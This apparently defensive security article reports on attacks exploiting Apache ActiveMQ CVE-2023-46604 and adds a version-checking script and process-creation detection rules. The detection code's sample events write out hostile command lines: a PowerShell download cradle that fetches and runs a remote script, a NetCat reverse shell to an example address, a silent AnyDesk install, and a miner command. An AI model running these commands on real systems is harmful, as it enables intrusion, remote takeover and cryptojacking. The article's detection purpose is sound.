A Remote Code Execution (RCE) vulnerability in Apache ActiveMQ servers (CVE-2023-46604) continues to be exploited by several groups, including the operators of Kinsing, GoTitan and HelloKitty. Subsequent findings show that attackers are also bringing additional tooling into these intrusions, including the Ladon scanning and exploitation framework, the NetCat utility and the z0Miner cryptominer.
Researchers at AhnLab's ASEC have documented this tool set being used against the RCE vulnerability. Unpatched servers that are reachable from external networks are exposed: the flaw lets a remote, unauthenticated attacker run commands on the server.
The vulnerability lies in how the OpenWire protocol unmarshals serialised classes: the broker instantiates whatever class from its classpath the incoming packet names, without validating it. The attacker sends a crafted packet that names such a class and supplies a URL as its argument; the class fetches an XML file from that URL, and the commands defined in that file are then executed on the server.
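Since the practical question for a defender is whether a given broker still needs the patch, here is an added example (not code from the original article or from ASEC) that reads the OpenWire WireFormatInfo frame an ActiveMQ broker sends when a TCP client connects, extracts its `ProviderVersion` string and compares it with the fix levels from the Apache advisory (5.15.16, 5.16.7, 5.17.6, 5.18.3). Assumptions: the default OpenWire port 61616, that the broker sends WireFormatInfo unsolicited on connect, and a sample frame that is constructed here in the loose OpenWire layout rather than captured from a real broker. The parser locates the `ProviderVersion` key and reads the string value after it instead of decoding the whole frame, so it also works on brokers that send extra properties.

```python
import re
import socket
import struct
import sys

WIRE_FORMAT_INFO = 1           # OpenWire command-type byte for WireFormatInfo
OPENWIRE_MAGIC = b"ActiveMQ"   # 8-byte magic that follows the command type
STRING_TYPE = 9                # type tag for a short string in an OpenWire primitive map

# Fix levels from the Apache advisory for CVE-2023-46604, keyed by 5.x minor version.
# Everything before 5.15.16 is affected; 6.x was released after the fix.
FIX_LEVELS = {15: 16, 16: 7, 17: 6, 18: 3}


def parse_version(text):
    """Return (major, minor, patch) from a ProviderVersion string such as '5.18.2'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("no x.y.z version found in %r" % text)
    return tuple(int(x) for x in m.groups())


def is_vulnerable(version):
    """True if this ProviderVersion predates the fix for CVE-2023-46604."""
    major, minor, patch = parse_version(version)
    if major != 5:
        return major < 5            # 4.x is 'before 5.15.16'; 6.x shipped with the fix
    if minor in FIX_LEVELS:
        return patch < FIX_LEVELS[minor]
    return minor < 15               # 5.14 and older affected; later branches carry the fix (assumption)


def extract_provider_version(frame):
    """Pull the ProviderVersion string out of a raw WireFormatInfo frame.

    Layout: 4-byte size, 1-byte command type, 8-byte magic, then the marshalled
    property map, where each string value is a type byte (9), a 2-byte big-endian
    length and UTF-8 bytes. Only the key we care about is located and decoded.
    """
    if len(frame) < 13 or frame[4] != WIRE_FORMAT_INFO or frame[5:13] != OPENWIRE_MAGIC:
        raise ValueError("not an OpenWire WireFormatInfo frame")
    key = b"ProviderVersion"
    idx = frame.find(key)
    if idx < 0:
        raise ValueError("ProviderVersion property not present")
    pos = idx + len(key)
    if frame[pos] != STRING_TYPE:
        raise ValueError("unexpected type tag 0x%02x after ProviderVersion" % frame[pos])
    (length,) = struct.unpack(">H", frame[pos + 1:pos + 3])
    return frame[pos + 3:pos + 3 + length].decode("utf-8")


def check_frame(frame):
    """Return {'version': str, 'vulnerable': bool} for a WireFormatInfo frame."""
    version = extract_provider_version(frame)
    return {"version": version, "vulnerable": is_vulnerable(version)}


def _utf(text):
    data = text.encode("utf-8")
    return struct.pack(">H", len(data)) + data


def build_wire_format_info(provider_version, openwire_version=12):
    """Constructed sample frame in the loose OpenWire layout (assumption: a real broker
    sends the same structure with more properties). Used so the check runs offline."""
    props = {"ProviderName": "ActiveMQ", "ProviderVersion": provider_version}
    body = struct.pack(">i", len(props))
    for key, value in props.items():
        body += _utf(key) + bytes([STRING_TYPE]) + _utf(value)
    payload = (bytes([WIRE_FORMAT_INFO]) + OPENWIRE_MAGIC + struct.pack(">i", openwire_version)
               + b"\x01" + struct.pack(">i", len(body)) + body)   # 0x01: property map present
    return struct.pack(">i", len(payload)) + payload


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed before a full frame arrived")
        buf += chunk
    return buf


def fetch_wire_format_info(host, port=61616, timeout=5.0):
    """Network path: read the length-prefixed WireFormatInfo the broker sends on connect."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        header = _recv_exact(sock, 4)
        (size,) = struct.unpack(">i", header)
        return header + _recv_exact(sock, size)


if __name__ == "__main__":
    # Usage: python activemq_check.py <host> [port]; with no host, the constructed sample is used.
    if len(sys.argv) > 1:
        frame = fetch_wire_format_info(sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else 61616)
    else:
        frame = build_wire_format_info("5.18.2")
    print(check_frame(frame))
```

Run it only against brokers you are authorised to test; it performs a single passive read and never sends OpenWire commands. A broker that reports a version below its branch's fix level, or any 5.14 or older release, should be patched or taken off the network edge.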
Ladon
Ladon, a scanning and exploitation framework used predominantly by Chinese-speaking threat actors, plays a central role in these intrusions.
Beyond scanning for hosts affected by CVE-2023-46604, Ladon bundles a range of other functions, including credential theft, reverse shells and privilege escalation.

The attacker runs PowerShell commands through the vulnerable Apache ActiveMQ service to download Ladon.
A reverse shell command is then issued to obtain interactive control of the compromised system.
NetCat
The NetCat utility, a general-purpose tool for reading and writing data over TCP and UDP, also featured prominently in the attacks. Ladon's reverse shell command relies on NetCat, and in other cases NetCat was downloaded separately from another source.

The tool runs on both Linux and Windows and has legitimate uses in network testing, but its ability to attach a shell to a network socket is exactly what attackers want from it. In a notable twist, after deploying NetCat the attacker installed AnyDesk, a remote administration tool. AnyDesk was installed silently through a PowerShell command that also set an access password, following the pattern observed in earlier attacks.
z0Miner
The researchers also observed installation of the XMRig CoinMiner, tracked as z0Miner, marked by an XML file named 'paste.xml'. That file launches CMD, which in turn runs PowerShell commands that download the CoinMiner.
Further analysis showed the strain to be similar to the z0Miner reported in 2020, which was associated with exploits targeting Oracle WebLogic and Atlassian Confluence RCE vulnerabilities in 2021.
The consequences of these attacks extend beyond simple system compromise, ranging from cryptocurrency mining to data theft and ransomware deployment. The researchers urge administrators to update Apache ActiveMQ to a patched release (5.15.16, 5.16.7, 5.17.6 or 5.18.3 and later) and to avoid exposing the OpenWire port (61616/TCP by default) to the internet.
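Every stage described above (the ActiveMQ service spawning a shell, the PowerShell download of Ladon and NetCat, the NetCat reverse shell, the silent AnyDesk install with a preset password, and the XMRig miner) leaves a distinctive process-creation event. The following detection logic is an added example and is not code from the original article or from ASEC; it runs over constructed events shaped like Sysmon Event ID 1 records (field names and the 198.51.100.23 address are assumptions for illustration). The AnyDesk `--install`, `--silent` and `--set-password` switches and the XMRig `--donate-level` and `stratum+tcp://` strings are from those tools' own command-line usage.

```python
import ntpath

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
NETCAT = {"nc.exe", "nc64.exe", "ncat.exe"}
# Strings a download cradle leaves in a shell command line (PowerShell and LOLBins).
DOWNLOAD_CRADLES = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
                    "curl ", "certutil", "bitsadmin")


def _base(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def classify(event):
    """Return the names of the rules a single process-creation event triggers."""
    hits = []
    parent = _base(event.get("parent_image", ""))
    image = _base(event.get("image", ""))
    cmd = event.get("command_line", "").lower()
    pcmd = event.get("parent_command_line", "").lower()

    # 1. The ActiveMQ JVM has no business spawning a shell; this is the exploit's first visible step.
    if parent == "java.exe" and "activemq" in pcmd and image in SHELLS:
        hits.append("activemq_spawned_shell")
    # 2. A download cradle in a shell: how Ladon, NetCat, AnyDesk and the miner are fetched.
    if image in SHELLS and any(c in cmd for c in DOWNLOAD_CRADLES):
        hits.append("download_cradle")
    # 3. NetCat reverse shell: remote address plus -e/-c binding a program to the socket.
    if image in NETCAT and (" -e " in cmd or " -c " in cmd):
        hits.append("netcat_reverse_shell")
    # 4. Unattended AnyDesk install or password set, whether run directly or via a shell.
    if "anydesk" in cmd and ("--silent" in cmd or "--set-password" in cmd):
        hits.append("anydesk_silent_install")
    # 5. XMRig, even when the binary has been renamed: match its own flags and pool scheme.
    if image == "xmrig.exe" or "--donate-level" in cmd or "stratum+tcp://" in cmd:
        hits.append("xmrig_miner")
    return hits


def scan(events):
    """Return [(index, hits)] for every event that triggers at least one rule."""
    results = []
    for i, event in enumerate(events):
        hits = classify(event)
        if hits:
            results.append((i, hits))
    return results


# Constructed sample events (not real telemetry); paths and addresses are illustrative.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Java\bin\java.exe",
     "parent_command_line": r"java.exe -jar C:\apache-activemq-5.18.2\bin\activemq.jar start",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c powershell -nop -w hidden -c \"IEX (New-Object "
                     "Net.WebClient).DownloadString('http://198.51.100.23/a.ps1')\""},
    {"parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_command_line": "powershell -nop -w hidden",
     "image": r"C:\Users\Public\AnyDesk.exe",
     "command_line": r'AnyDesk.exe --install "C:\ProgramData\AnyDesk" --start-with-win --silent'},
    {"parent_image": r"C:\Windows\System32\cmd.exe",
     "parent_command_line": "cmd.exe",
     "image": r"C:\Users\Public\nc.exe",
     "command_line": "nc.exe 198.51.100.23 4444 -e cmd.exe"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "parent_command_line": "explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe report.txt"},
    {"parent_image": r"C:\Java\bin\java.exe",              # another JVM, not ActiveMQ: benign
     "parent_command_line": "java -jar jenkins.war",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c git --version"},
    {"parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_command_line": "powershell -nop -w hidden",
     "image": r"C:\ProgramData\svchost.exe",                 # renamed miner
     "command_line": "svchost.exe -o stratum+tcp://198.51.100.23:3333 --donate-level 1"},
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["image"], hits)
```

Rule 1 is the highest-fidelity signal and fires before any payload lands; the parent-command-line check keeps other JVMs on the host from generating noise. The remaining rules are each useful on their own, but seeing them chained under the ActiveMQ process tree is what distinguishes this campaign from ordinary administrative activity.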
